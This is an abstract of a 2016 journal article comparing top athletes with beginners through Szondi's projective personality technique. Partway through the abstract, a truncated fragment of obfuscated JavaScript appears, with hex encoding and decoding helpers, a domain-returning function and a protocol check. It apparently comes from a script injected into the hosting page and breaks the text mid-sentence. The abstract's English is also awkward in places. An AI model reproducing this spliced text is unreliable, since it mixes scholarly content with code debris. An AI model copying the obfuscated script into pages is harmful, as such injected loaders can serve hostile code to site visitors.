Сomparative psychological diagnostics of sportsmen of high qualification and sportsmen not having sport achievements (The Journal of Psychology and Sociology, 2016)
Level of sporting achievements in professional sport now is so high, what is possible to get to number of successful, productive sportsman not to each sports man. In this regard problems of selection, psychological maintenance of training process, precompetitive and competitive stages in sports psychology is particularly acute more than ever as it is known that the sports victory and sports result are not only good physical preparation and the necessary functional condition of an organ ism. Besides a physiological and functional component, the accounting of a mental condition of a sportsman, development of his mental processes and feature of its mental properties, and also psychological readiness to sports activity and difficulties of a profession is necessary.The article discusses the results of psychological research highly skilled athletes and beginners who have no sporting achievements using projective techniques of personality study Szondi. Besides Szondi’s technique also other psychodiagnostic techniques were used, but we want to concentrate the main look in this article on the results received by Szondi’s technique. The projective interpretive technique of Leopold Szondi is the unique diagnostic and therapeutic tool allowing to track psychosomatic communications. Research results will interest not only psycholo gists in the field of sport but also specialists, interested in the applied use of project methodologies.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Keywords: sportsmen; high qualification; sport achievements; project meth odology of Szondi.